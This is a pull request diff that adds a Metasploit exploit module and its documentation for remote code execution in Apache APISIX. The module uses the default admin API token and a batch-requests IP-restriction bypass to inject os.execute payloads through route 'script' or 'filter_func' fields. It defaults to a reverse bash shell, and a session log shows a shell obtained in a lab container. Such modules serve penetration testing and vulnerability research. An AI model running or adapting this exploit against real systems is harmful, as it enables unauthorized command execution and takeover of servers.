### PR TITLE
Added Apache APISIX default API Token RCE module

### DIFF
--- a/documentation/modules/exploit/multi/http/apache_apisix_api_default_token_rce.md
+++ b/documentation/modules/exploit/multi/http/apache_apisix_api_default_token_rce.md
@@ -1,0 +1,54 @@
+## Vulnerable Application
+
+A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution.
+
+The Apache APISIX has a default API token `edd1c9f034335f136f87ad84b625c8f1` defined at `conf/config.yaml` and in its default configuration has doesn't come with the `ip-restriction` plugin enabled, what allow any user to add a new route in its default confiuration. By leveraging the feature `script` added in the 2.x version an user can add a route which leads to the remote LUA code execution (CVE-2020-13945).
+
+This module was tested using a vulnerable docker container as available on the [vulnhub ](https://github.com/vulhub/apisix/CVE-2020-13945/docker-compose.yml) project.
+
+## Verification Steps
+Confirm that functionality works:
+1. Start `msfconsole`
+2. `use exploit/multi/http/apache_apisix_api_default_token_rce`
+3. set `RHOSTS` and `RPORT`
+4. Confirm the target is vulnerable: `check`
+5. Confirm that the target is vulnerable: `The target is vulnerable.`
+6. It come already with a default payload `cmd/unix/reverse_bash`
+7. set `LHOST` and `LPORT`
+8. `exploit`
+9. Confirm you have now a cmd session
+
+## Options
+
+### TARGETURI (required)
+
+The path to the APISIX routes controller (Default: `/apisix/admin/routes`).
+
+### API_KEY (required)
+
+The admin API KEY for APISIX (Default: `edd1c9f034335f136f87ad84b625c8f1`).
+
+
+## Scenarios
+```
+msf6 exploit(multi/http/apache_apisix_api_default_token_rce) > set payload cmd/unix/reverse_bash
+payload => cmd/unix/reverse_bash
+msf6 exploit(multi/http/apache_apisix_api_default_token_rce) > run rhosts=127.0.0.1 rport=9080 lhost=docker0 lport=4444
+
+[*] Started reverse TCP handler on 172.17.0.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking component version to 127.0.0.1:9080
+[+] The target appears to be vulnerable.
+[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.18.0.4:48162 ) at 2022-02-28 18:32:50 +0100
+id
+
+uid=99(nobody) gid=99(nobody) groups=99(nobody)
+uname -a
+Linux 58f5aba16de9 5.16.8-arch1-1 #1 SMP PREEMPT Tue, 08 Feb 2022 21:21:08 +0000 x86_64 x86_64 x86_64 GNU/Linux
+exit
+[*] 127.0.0.1 - Command shell session 1 closed.
+msf6 exploit(multi/http/apache_apisix_api_default_token_rce) > 
+```
+
+### Version and OS
+This module has been tested successfully on Apache APISIX 2.11.0.

--- a/documentation/modules/exploit/multi/http/apache_apisix_api_default_token_rce.md
+++ b/documentation/modules/exploit/multi/http/apache_apisix_api_default_token_rce.md
@@ -3,21 +3,22 @@
 A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution.
 
 The Apache APISIX has a default API token `edd1c9f034335f136f87ad84b625c8f1` defined at `conf/config.yaml` and in its default configuration
-has doesn't come with the `ip-restriction` plugin enabled, what allow any user to add a new route in its default confiuration.
-By leveraging the feature `script` added in the 2.x version an user can add a route which leads to the remote LUA code execution
-(CVE-2020-13945). Even if there is ip-restriction enabled, this exploit relay on the vulnerability CVE-2022-24112 to circuvent that
-restriction.
+doesn't come with the `ip-restriction` plugin enabled. This allows any user to add a new route in its default configuration. By leveraging
+the feature `script` added in the 2.x version an user can add a route which leads to the remote LUA code execution (CVE-2020-13945). Even if
+ip-restriction is enabled, this exploit can leverage the vulnerability CVE-2022-24112 to circumvent that restriction.
 
-This module was tested using a vulnerable docker container as available on the [vulnhub](https://github.com/vulhub/apisix/CVE-2020-13945/docker-compose.yml) project.
+This module was tested using a vulnerable docker container as available on the
+[vulnhub](https://github.com/vulhub/apisix/CVE-2020-13945/docker-compose.yml) project.
 
 If we have the API token we can execute command using the parameter `filter_func` or `script`, and if there is an IP restriction
-enabled by the plugin ip-restriction we can bypass this restiction if the plugin batch-request is also enabled.
+enabled by the plugin ip-restriction we can bypass this restriction if the batch-requests plugin is also enabled.
 
 ### Version and OS
 This module has been tested successfully on Apache APISIX 2.2, 2.6, 2.11.0 and 2.12.1
 
 ## Verification Steps
 Confirm that functionality works:
+
 1. Start `msfconsole`
 2. `use exploit/multi/http/apache_apisix_api_default_token_rce`
 3. set `RHOSTS` and `RPORT`

--- a/documentation/modules/exploit/multi/http/apache_apisix_api_default_token_rce.md
+++ b/documentation/modules/exploit/multi/http/apache_apisix_api_default_token_rce.md
@@ -2,7 +2,11 @@
 
 A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution.
 
-The Apache APISIX has a default API token `edd1c9f034335f136f87ad84b625c8f1` defined at `conf/config.yaml` and in its default configuration has doesn't come with the `ip-restriction` plugin enabled, what allow any user to add a new route in its default confiuration. By leveraging the feature `script` added in the 2.x version an user can add a route which leads to the remote LUA code execution (CVE-2020-13945).
+The Apache APISIX has a default API token `edd1c9f034335f136f87ad84b625c8f1` defined at `conf/config.yaml` and in its default configuration
+has doesn't come with the `ip-restriction` plugin enabled, what allow any user to add a new route in its default confiuration.
+By leveraging the feature `script` added in the 2.x version an user can add a route which leads to the remote LUA code execution
+(CVE-2020-13945). Even if there is ip-restriction enabled, this exploit relay on the vulnerability CVE-2022-24112 to circuvent that
+restriction.
 
 This module was tested using a vulnerable docker container as available on the [vulnhub ](https://github.com/vulhub/apisix/CVE-2020-13945/docker-compose.yml) project.
 
@@ -28,6 +32,9 @@ The path to the APISIX routes controller (Default: `/apisix/admin/routes`).
 
 The admin API KEY for APISIX (Default: `edd1c9f034335f136f87ad84b625c8f1`).
 
+### ALLOWED_IP (required)
+
+An IP address that is knew to be in the allowed list (Default: `127.0.0.1`).
 
 ## Scenarios
 ```
@@ -50,5 +57,5 @@ exit
 msf6 exploit(multi/http/apache_apisix_api_default_token_rce) > 
 ```
 
-### Version and OS
+.h3 Version and OS
 This module has been tested successfully on Apache APISIX 2.11.0.

--- a/documentation/modules/exploit/multi/http/apache_apisix_api_default_token_rce.md
+++ b/documentation/modules/exploit/multi/http/apache_apisix_api_default_token_rce.md
@@ -8,7 +8,13 @@ By leveraging the feature `script` added in the 2.x version an user can add a ro
 (CVE-2020-13945). Even if there is ip-restriction enabled, this exploit relay on the vulnerability CVE-2022-24112 to circuvent that
 restriction.
 
-This module was tested using a vulnerable docker container as available on the [vulnhub ](https://github.com/vulhub/apisix/CVE-2020-13945/docker-compose.yml) project.
+This module was tested using a vulnerable docker container as available on the [vulnhub](https://github.com/vulhub/apisix/CVE-2020-13945/docker-compose.yml) project.
+
+If we have the API token we can execute command using the parameter `filter_func` or `script`, and if there is an IP restriction
+enabled by the plugin ip-restriction we can bypass this restiction if the plugin batch-request is also enabled.
+
+### Version and OS
+This module has been tested successfully on Apache APISIX 2.2, 2.6, 2.11.0 and 2.12.1
 
 ## Verification Steps
 Confirm that functionality works:
@@ -26,7 +32,7 @@ Confirm that functionality works:
 
 ### TARGETURI (required)
 
-The path to the APISIX routes controller (Default: `/apisix/admin/routes`).
+The path to the APISIX routes controller (Default: `/apisix`).
 
 ### API_KEY (required)
 
@@ -56,6 +62,3 @@ exit
 [*] 127.0.0.1 - Command shell session 1 closed.
 msf6 exploit(multi/http/apache_apisix_api_default_token_rce) > 
 ```
-
-.h3 Version and OS
-This module has been tested successfully on Apache APISIX 2.11.0.

--- a/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
+++ b/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
@@ -60,20 +60,28 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    # perform an unautheticated request to a random path
+    # perform an unautheticated request
     res = send_request_cgi({
-      'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(6)), # random path
+      'uri' => normalize_uri(target_uri, '/admin/routes'),
       'method' => 'GET'
     })
 
     unless res && res.headers.key?('Server')
-      return Exploit::CheckCode::Safe('Seems not a APISIX server')
+      return Exploit::CheckCode::Unknown('Unable to determine which web server is running')
     end
 
-    res.headers['Server'].match(%r{APISIX/(.*)$})
-    version = Rex::Version.new(Regexp.last_match(1))
-    vprint_status("Found an APISIX #{version}")
-    unless version > Rex::Version.new('2')
+    res.headers['Server'].match(%r{(.*)/([\d|.]+)$})
+
+    server = Regexp.last_match(1) || nil
+    version = Rex::Version.new(Regexp.last_match(2)) || nil
+
+    unless server && server.match(/APISIX/)
+      return Exploit::CheckCode::Safe("There isn't an APISIX server running")
+    end
+
+    vprint_status("Found an #{server} #{version} http server header")
+
+    unless server && version > Rex::Version.new('2')
       return Exploit::CheckCode::Safe('This version has not the script feature')
     end
 
@@ -157,7 +165,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST'
     }
 
-    params.merge!({ 'data' => JSON::dump(data) })
+    params.merge!({ 'data' => JSON.dump(data) })
 
     apisix_request(params)
   end

--- a/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
+++ b/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
@@ -35,16 +35,11 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2020-12-07',
         'Arch' => ARCH_CMD,
-        'Platform' => %w[win unix],
+        'Platform' => %w[unix],
         'Targets' => [
           [
-            'Unix (In-Memory)',
-            {
-              'Platform' => 'unix',
-              'Arch' => ARCH_CMD,
-              'Type' => :unix_memory,
-              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
-            }
+            'Automatic',
+            { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } }
           ]
         ],
         'Privileged' => false,
@@ -101,13 +96,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    payload_uri = "/#{Rex::Text.rand_text_alpha_lower(3)}/#{Rex::Text.rand_text_alpha_lower(6)}"
     if direct_access?
-      # puts "direct_access"
-      add_route_direct
+      add_route
     else
-      print_status 'Trying to bypass restriction'
-      add_route_batch payload_uri
+      vprint_status 'Trying to bypass restriction'
+      payload_uri = "/#{Rex::Text.rand_text_alpha_lower(3)}/#{Rex::Text.rand_text_alpha_lower(6)}"
+      add_route_batch(payload_uri)
       # trigger the payload
       apisix_request({
         'uri' => normalize_uri(payload_uri),
@@ -115,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
       })
     end
     handler
-    # clean_up payload_uri
+    clean_up(payload_uri) if payload_uri
   end
 
   # Using batch request to bypass ip-restricion policies (CVE-2022-24112)
@@ -140,32 +134,36 @@ class MetasploitModule < Msf::Exploit::Remote
       headers: headers,
       timeout: 1500,
       pipeline: pipeline
-    }.to_json.gsub(/\\u(....)/) { [Regexp.last_match(1).hex].pack('U') } # handle unicode
+    }.to_json
   end
 
   def base_data
     {
-      uri: Rex::Text.rand_text_alpha_lower(6),
-      upstream: {
-        type: 'roundrobin',
-        nodes: { "#{Rex::Text.rand_text_alpha_lower(6)}.#{Rex::Text.rand_text_alpha_lower(3)}": 1 }
+      'uri' => Rex::Text.rand_text_alpha_lower(6),
+      'upstream' => {
+        'type' => 'roundrobin',
+        'nodes' => { "#{Rex::Text.rand_text_alpha_lower(6)}.#{Rex::Text.rand_text_alpha_lower(3)}": 1 }
       }
     }
   end
 
-  def add_route_direct
-    # binding.pry
-    params = base_data.merge({
-      uri: normalize_uri("#{target_uri.path}/admin/routes"),
-      method: 'POST',
-      script: "os.execute('PAYLOAD');"
-    }).to_json
-    params.gsub!('PAYLOAD', payload.raw.to_s.gsub('\'') { '\\\"' })
+  def add_route
+    # This method use the script parameter to execute the payload
+    data = base_data.merge({
+      'script' => "os.execute('PAYLOAD');".gsub!('PAYLOAD', payload.raw.to_s.gsub('\'') { '\\\"' })
+    })
+    params = {
+      'uri' => normalize_uri("#{target_uri.path}/admin/routes"),
+      'method' => 'POST'
+    }
 
-    apisix_request JSON(params)
+    params.merge!({ 'data' => JSON::dump(data) })
+
+    apisix_request(params)
   end
 
   def add_route_batch(payload_uri)
+    # This methos use the filter_func parameter to execute the payload
     data = base_data.merge({
       uri: payload_uri,
       name: Rex::Text.rand_text_alpha_lower(6),
@@ -198,13 +196,12 @@ class MetasploitModule < Msf::Exploit::Remote
         body: data
       }
     ]
-    # add the route
+    # remove the route
     res = batch_request(batch_body(pipeline))
     fail_with(Failure::UnexpectedReply, 'Unable to delete the route') unless res.code == 200
   end
 
   def apisix_request(params = {})
-    fail_with(Failure::BadConfig, 'XXXX.') unless params.key?('method') || params.key?('uri')
     params.merge!({
       'ctype' => 'application/json',
       'headers' => {
@@ -213,8 +210,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Accept-Encoding' => 'gzip, deflate'
       }
     })
-    # puts params
-    send_request_cgi params
+
+    send_request_cgi(params)
   end
 
   def direct_access?
@@ -223,6 +220,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'GET'
     })
     res && res.code == 200
+    # false # test
   end
 
 end

--- a/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
+++ b/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
@@ -60,12 +60,38 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
-    # perform an unautheticated request
-    res = send_request_cgi({
-      'uri' => normalize_uri(target_uri, '/admin/routes'),
-      'method' => 'GET'
-    })
+    # batch request is the preferred method because it bypass the ip-restriction plugin
+    res = nil
+    if batch_request_enabled?
 
+      pipeline = [
+        {
+          method: 'GET',
+          path: "#{target_uri.path}/admin/routes"
+        }
+      ]
+      res = batch_request(batch_body(pipeline))
+      vprint_good('Can perform authenticated requests through batch requests') if res && res.code == 200
+
+      pipeline = [
+        {
+          method: 'GET',
+          path: "#{target_uri.path}/admin/routes/index"
+        }
+      ]
+      res = batch_request(batch_body(pipeline))
+
+    else
+      vprint_error('The batch request is not enabled')
+
+      vprint_good('There is direct access to the routes using the provided token') if direct_access?
+
+      res = apisix_request({
+        'uri' => normalize_uri(target_uri.path, Rex::Text.rand_text_alpha_lower(6)),
+        'method' => 'GET'
+      })
+
+    end
     unless res && res.headers.key?('Server')
       return Exploit::CheckCode::Unknown('Unable to determine which web server is running')
     end
@@ -75,138 +101,46 @@ class MetasploitModule < Msf::Exploit::Remote
     server = Regexp.last_match(1) || nil
     version = Rex::Version.new(Regexp.last_match(2)) || nil
 
-    unless server && server.match(/APISIX/)
-      return Exploit::CheckCode::Safe("There isn't an APISIX server running")
+    if server && server.match(/APISIX/)
+      vprint_status("Found an #{server} #{version} http server header")
+      return Exploit::CheckCode::Appears if version > Rex::Version.new('2')
     end
-
-    vprint_status("Found an #{server} #{version} http server header")
-
-    unless server && version > Rex::Version.new('2')
-      return Exploit::CheckCode::Safe('This version has not the script feature')
-    end
-
-    vprint_good('This version has the script feature')
-    return Exploit::CheckCode::Appears('There is direct access to the routes using the provided token') if direct_access?
-
-    vprint_status('There is no direct access to the routes. Trying to bypass restriction')
-    pipeline = [
-      {
-        method: 'GET',
-        path: "#{target_uri.path}/admin/routes"
-      }
-    ]
-    res = batch_request(batch_body(pipeline))
-    if res && res.code == 200
-      return Exploit::CheckCode::Appears('Can bypass restriction using batch request')
-    end
-
-    return Exploit::CheckCode::Unknown
+    return Exploit::CheckCode::Safe("There isn't an APISIX server running")
   end
 
   def exploit
-    if direct_access?
-      add_route
-    else
-      vprint_status 'Trying to bypass restriction'
-      payload_uri = "/#{Rex::Text.rand_text_alpha_lower(3)}/#{Rex::Text.rand_text_alpha_lower(6)}"
-      add_route_batch(payload_uri)
+    # batch request is the preferred method because it bypass the ip-restriction plugin
+    if batch_request_enabled?
+      @payload_uri = "/#{Rex::Text.rand_text_alpha_lower(3)}/#{Rex::Text.rand_text_alpha_lower(6)}"
+      filter_func_exec
       # trigger the payload
       apisix_request({
-        'uri' => normalize_uri(payload_uri),
+        'uri' => normalize_uri(@payload_uri),
         'method' => 'GET'
       })
+    else
+      add_route
     end
     handler
-    clean_up(payload_uri) if payload_uri
   end
 
-  # Using batch request to bypass ip-restricion policies (CVE-2022-24112)
-  def batch_request(data = nil)
-    params = {
-      'uri' => normalize_uri(target_uri.path.to_s + '/batch-requests'),
-      'method' => 'POST'
+  def cleanup
+    return unless @payload_uri
+
+    data = {
+      'uri' => @payload_uri
     }
-    params.merge!({ 'data' => data }) if data
-
-    apisix_request(params)
-  end
-
-  def batch_body(pipeline = [])
-    headers = {
-      'X-Real-IP': datastore['ALLOWED_IP'].to_s,
-      'X-API-KEY' => datastore['API_KEY'].to_s,
-      'Content-Type': 'application/json'
-    }
-
-    {
-      headers: headers,
-      timeout: 1500,
-      pipeline: pipeline
-    }.to_json
-  end
-
-  def base_data
-    {
-      'uri' => Rex::Text.rand_text_alpha_lower(6),
-      'upstream' => {
-        'type' => 'roundrobin',
-        'nodes' => { "#{Rex::Text.rand_text_alpha_lower(6)}.#{Rex::Text.rand_text_alpha_lower(3)}": 1 }
-      }
-    }
-  end
-
-  def add_route
-    # This method use the script parameter to execute the payload
-    data = base_data.merge({
-      'script' => "os.execute('PAYLOAD');".gsub!('PAYLOAD', payload.raw.to_s.gsub('\'') { '\\\"' })
-    })
-    params = {
-      'uri' => normalize_uri("#{target_uri.path}/admin/routes"),
-      'method' => 'POST'
-    }
-
-    params.merge!({ 'data' => JSON.dump(data) })
-
-    apisix_request(params)
-  end
-
-  def add_route_batch(payload_uri)
-    # This methos use the filter_func parameter to execute the payload
-    data = base_data.merge({
-      uri: payload_uri,
-      name: Rex::Text.rand_text_alpha_lower(6),
-      method: '[GET]',
-      filter_func: "function(vars) os.execute('PAYLOAD'); return true end"
-    }).to_json
-    data.gsub!('PAYLOAD', payload.raw.to_s.gsub('\'') { '\\\"' })
-
     pipeline = [
       {
-        method: 'PUT',
-        path: "#{target_uri.path}/admin/routes/index",
-        body: data
+        'path' => normalize_uri(target_uri.path, '/admin/routes/index'),
+        'method' => 'DELETE',
+        'body' => JSON.dump(data)
       }
     ]
-    # add the route
-    res = batch_request(batch_body(pipeline))
-    fail_with(Failure::UnexpectedReply, 'Unable to create route') unless res.code == 200
-  end
-
-  def clean_up(route)
-    data = base_data.merge({
-      uri: route,
-      method: '[GET]'
-    }).to_json
-    pipeline = [
-      {
-        method: 'DELETE',
-        path: "#{target_uri.path}/admin/routes/index",
-        body: data
-      }
-    ]
+    vprint_status("Deleting route #{@payload_uri}")
     # remove the route
     res = batch_request(batch_body(pipeline))
-    fail_with(Failure::UnexpectedReply, 'Unable to delete the route') unless res.code == 200
+    vprint_error('Unable to delete the route') unless res.code == 200
   end
 
   def apisix_request(params = {})
@@ -222,13 +156,118 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi(params)
   end
 
+  # Using batch request to bypass ip-restricion policies (CVE-2022-24112)
+  def batch_request(data = nil)
+    params = {
+      'uri' => normalize_uri(target_uri.path, '/batch-requests'),
+      'method' => 'POST'
+    }
+    params.merge!({ 'data' => data }) if data
+
+    apisix_request(params)
+  end
+
+  def batch_body(pipeline = [])
+    headers = {
+      'X-Real-IP': datastore['ALLOWED_IP'].to_s,
+      'X-API-KEY' => datastore['API_KEY'].to_s,
+      'Content-Type' => 'application/json'
+    }
+
+    {
+      'headers' => headers,
+      'timeout' => 1500,
+      'pipeline' => pipeline
+    }.to_json
+  end
+
+  def base_data
+    {
+      'uri' => Rex::Text.rand_text_alpha_lower(6),
+      'upstream' => {
+        'type' => 'roundrobin',
+        'nodes' => { Faker::Internet.domain_name.to_s => 1 }
+      }
+    }
+  end
+
+  def add_route
+    # This method use the script parameter to execute the payload
+    stub = "os.execute('PAYLOAD');".gsub('PAYLOAD', payload.raw.to_s.gsub('\'') { '\\\"' })
+    # binding.pry
+    data = base_data.merge({
+      'script' => stub
+    })
+    uri = normalize_uri(target_uri.path, '/admin/routes')
+    if batch_request_enabled?
+      pipeline = [
+        {
+          'method' => 'POST',
+          'path' => uri,
+          'body' => data
+        }
+      ]
+      batch_request(batch_body(pipeline))
+    else
+      params = {
+        'method' => 'POST',
+        'uri' => uri,
+        'data' => JSON.dump(data)
+      }
+      apisix_request(params)
+    end
+  end
+
+  def filter_func_exec
+    # This method use the filter_func parameter to execute the payload
+    stub = "function(vars) os.execute('PAYLOAD'); return true end".gsub('PAYLOAD', payload.raw.to_s.gsub('\'') { '\\\"' })
+
+    data = base_data.merge({
+      'uri' => @payload_uri,
+      'name' => Rex::Text.rand_text_alpha_lower(6),
+      'filter_func' => stub
+    })
+    if batch_request_enabled?
+      pipeline = [
+        {
+          'path' => normalize_uri(target_uri.path, '/admin/routes/index'),
+          'method' => 'PUT',
+          'body' => JSON.dump(data)
+        }
+      ]
+      # add the route
+      res = batch_request(batch_body(pipeline))
+      vprint_error('Unable to create route') unless res.code == 200
+    else
+      params = {
+        'method' => 'PUT',
+        'uri' => normalize_uri(target_uri.path, '/admin/routes/index'),
+        'data' => JSON.dump(data)
+      }
+      apisix_request(params)
+    end
+  end
+
   def direct_access?
     res = apisix_request({
-      'uri' => normalize_uri("#{target_uri.path}/admin/routes"),
+      'uri' => normalize_uri(target_uri.path, '/admin/routes'),
       'method' => 'GET'
     })
-    res && res.code == 200
-    # false # test
+
+    return false if [401, 403].include?(res.code) || res.body.match?(/'ip-restriction'/)
+
+    true
+  end
+
+  def batch_request_enabled?
+    res = apisix_request({
+      'uri' => normalize_uri(target_uri.path, '/batch-requests'),
+      'method' => 'GET'
+    })
+
+    return false if res.code == 404
+
+    true
   end
 
 end

--- a/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
+++ b/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
@@ -18,6 +18,8 @@ class MetasploitModule < Msf::Exploit::Remote
           Apache APISIX has a default built-in API token edd1c9f034335f136f87ad84b625c8f1
           that can be used to access all the admin API, which leads to the
           remote LUA code execution through the script parameter added in the 2.x version.
+          This module also leverages the another vulnerability to bypass the IP restriction
+          plugin.
         },
         'Author' => [
           'Heyder Andrade <eu[at]heyderandrade.org>', # module development and debugging
@@ -26,8 +28,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'References' => [
           ['CVE', '2020-13945'],
+          ['CVE', '2022-24112'],
           ['URL', 'https://github.com/apache/apisix/pull/2244'],
-          ['URL', 'https://seclists.org/oss-sec/2020/q4/187']
+          ['URL', 'https://seclists.org/oss-sec/2020/q4/187'],
+          ['URL', 'https://www.openwall.com/lists/oss-security/2022/02/11/3']
         ],
         'DisclosureDate' => '2020-12-07',
         'Arch' => ARCH_CMD,
@@ -54,7 +58,8 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     register_options([
       OptString.new('TARGETURI', [true, 'Path to the batch-request controller', '/apisix/batch-requests']),
-      OptString.new('API_KEY', [true, 'Admin API KEY (Default: edd1c9f034335f136f87ad84b625c8f1)', 'edd1c9f034335f136f87ad84b625c8f1'])
+      OptString.new('API_KEY', [true, 'Admin API KEY (Default: edd1c9f034335f136f87ad84b625c8f1)', 'edd1c9f034335f136f87ad84b625c8f1']),
+      OptString.new('ALLOWED_IP', [true, 'IP in the allowed list', '127.0.0.1'])
     ])
   end
 
@@ -74,14 +79,19 @@ class MetasploitModule < Msf::Exploit::Remote
         vprint_good 'This version has the script feature'
         # authenticated request to the admin routes
         res = send_request_cgi({
-          'uri' => normalize_uri(target_uri.path.to_s),
+          'uri' => normalize_uri('/apisix/admin/routes'),
           'method' => 'GET',
           'headers' => { 'X-API-KEY' => datastore['API_KEY'] }
         })
 
         if res && res.code == 200
-          vprint_good 'Succefully performed an authenticated request'
+          vprint_good 'Direct access to the routes'
           return Exploit::CheckCode::Appears
+        else
+          vprint_status 'Trying to bypass restriction'
+          # data = restriction_bypass('GET', '/apisix/admin/routes')
+          # res = request data
+          # TODO: check the response
         end
       else
         vprint_error 'This version has not the script feature'
@@ -100,49 +110,46 @@ class MetasploitModule < Msf::Exploit::Remote
     handler
   end
 
-  def add_route(path)
-    # unable to use the built-in lua payload because the default instalation of the APISIX doesn't have the socket module
-    # body = "{
-    #     \"uri\": \"#{path}\",
-    #     \"script\": \"require('os');os.execute('#{payload.raw.to_s.gsub('\'', '\"')}');\",
-    #     \"upstream\": {
-    #       \"type\": \"roundrobin\",
-    #       \"nodes\": {
-    #         \"#{Rex::Text.rand_text_alpha_lower(6)}.#{Rex::Text.rand_text_alpha_lower(3)}\": 1
-    #       }
-    #     }
-    #   }" # .to_json - cannot convert hash to json because it encode the '>' to unicode \u003C
-    body = "{\\\"uri\\\":\\\"#{path}\\\",\\\"script\\\":\\\"require('os');os.execute('PAYLOAD');\\\",\\\"upstream\\\":{\\\"type\\\":\\\"roundrobin\\\",\\\"nodes\\\":{\\\"example.com:80\\\":1}}}"
-    body.gsub!('PAYLOAD',payload.raw.to_s.gsub('\'') { '\\\\\\\"' } )
-    data = "{
-      \"headers\":{
-         \"X-Real-IP\": \"127.0.0.1\",
-         \"Content-Type\": \"application/json\"
-      },
-      \"timeout\": 500,
-      \"pipeline\": [
-        {
-          \"method\": \"POST\",
-          \"path\": \"/apisix/admin/routes\",
-          \"body\": \"#{body}\"
-        }
-      ]
-    }" #.to_json
+  def restriction_bypass(method, path, body = nil)
+    headers = {
+      'X-Real-IP': datastore['ALLOWED_IP'].to_s,
+      'Content-Type': 'application/json'
+    }
+    pipeline = {
+      method: method.to_s,
+      path: path.to_s
+    }
+    pipeline.merge!({ 'body' => body }) if body
 
-    binding.pry
-    send_request_cgi({
+    {
+      headers: headers,
+      timeout: 500,
+      pipeline: [pipeline]
+    }.to_json.gsub(/\\u(....)/) { [Regexp.last_match(1).hex].pack('U') } # handle unicode
+  end
+
+  def request(method = 'POST', data = nil)
+    params = {
       'uri' => normalize_uri(target_uri.path.to_s),
-      'method' => 'POST',
-      'data' => data,
+      'method' => method,
       'ctype' => 'application/json',
       'headers' => {
         'X-API-KEY' => datastore['API_KEY'],
         'Accept' => '*/*',
         'Accept-Encoding' => 'gzip, deflate'
       }
-    })
+    }
+    params.merge!({ 'data' => data }) if data
+    send_request_cgi(params)
+  end
+
+  def add_route(path)
+    body = "{\"uri\":\"#{path}\",\"script\":\"require('os');os.execute('PAYLOAD');\",\"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"example.com:80\":1}}}"
+    body.gsub!('PAYLOAD', payload.raw.to_s.gsub('\'') { '\\\"' })
+
+    data = restriction_bypass('POST', '/apisix/admin/routes', body)
+
+    request 'POST', data
   end
 
 end
-
-

--- a/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
+++ b/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
@@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           ['CVE', '2020-13945'],
           ['URL', 'https://github.com/apache/apisix/pull/2244'],
-          ['URL', 'ttps://seclists.org/oss-sec/2020/q4/187']
+          ['URL', 'https://seclists.org/oss-sec/2020/q4/187']
         ],
         'DisclosureDate' => '2020-12-07',
         'Arch' => ARCH_CMD,

--- a/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
+++ b/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
       )
     )
     register_options([
-      OptString.new('TARGETURI', [true, 'Path to the routes controller', '/apisix/admin/routes']),
+      OptString.new('TARGETURI', [true, 'Path to the batch-request controller', '/apisix/batch-requests']),
       OptString.new('API_KEY', [true, 'Admin API KEY (Default: edd1c9f034335f136f87ad84b625c8f1)', 'edd1c9f034335f136f87ad84b625c8f1'])
     ])
   end
@@ -102,20 +102,38 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def add_route(path)
     # unable to use the built-in lua payload because the default instalation of the APISIX doesn't have the socket module
-    body = "{
-        \"uri\": \"#{path}\",
-        \"script\": \"require('os');os.execute('#{payload.raw.to_s.gsub('\'', '\"')}');\",
-        \"upstream\": {
-          \"type\": \"roundrobin\",
-          \"nodes\": {
-            \"#{Rex::Text.rand_text_alpha_lower(6)}.#{Rex::Text.rand_text_alpha_lower(3)}\": 1
-          }
+    # body = "{
+    #     \"uri\": \"#{path}\",
+    #     \"script\": \"require('os');os.execute('#{payload.raw.to_s.gsub('\'', '\"')}');\",
+    #     \"upstream\": {
+    #       \"type\": \"roundrobin\",
+    #       \"nodes\": {
+    #         \"#{Rex::Text.rand_text_alpha_lower(6)}.#{Rex::Text.rand_text_alpha_lower(3)}\": 1
+    #       }
+    #     }
+    #   }" # .to_json - cannot convert hash to json because it encode the '>' to unicode \u003C
+    body = "{\\\"uri\\\":\\\"#{path}\\\",\\\"script\\\":\\\"require('os');os.execute('PAYLOAD');\\\",\\\"upstream\\\":{\\\"type\\\":\\\"roundrobin\\\",\\\"nodes\\\":{\\\"example.com:80\\\":1}}}"
+    body.gsub!('PAYLOAD',payload.raw.to_s.gsub('\'') { '\\\\\\\"' } )
+    data = "{
+      \"headers\":{
+         \"X-Real-IP\": \"127.0.0.1\",
+         \"Content-Type\": \"application/json\"
+      },
+      \"timeout\": 500,
+      \"pipeline\": [
+        {
+          \"method\": \"POST\",
+          \"path\": \"/apisix/admin/routes\",
+          \"body\": \"#{body}\"
         }
-      }" # .to_json - cannot convert hash to json because it encode the '>' to unicode \u003C
+      ]
+    }" #.to_json
+
+    binding.pry
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path.to_s),
       'method' => 'POST',
-      'data' => body,
+      'data' => data,
       'ctype' => 'application/json',
       'headers' => {
         'X-API-KEY' => datastore['API_KEY'],
@@ -126,3 +144,5 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
 end
+
+

--- a/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
+++ b/modules/exploits/multi/http/apache_apisix_api_default_token_rce.rb
@@ -15,11 +15,9 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
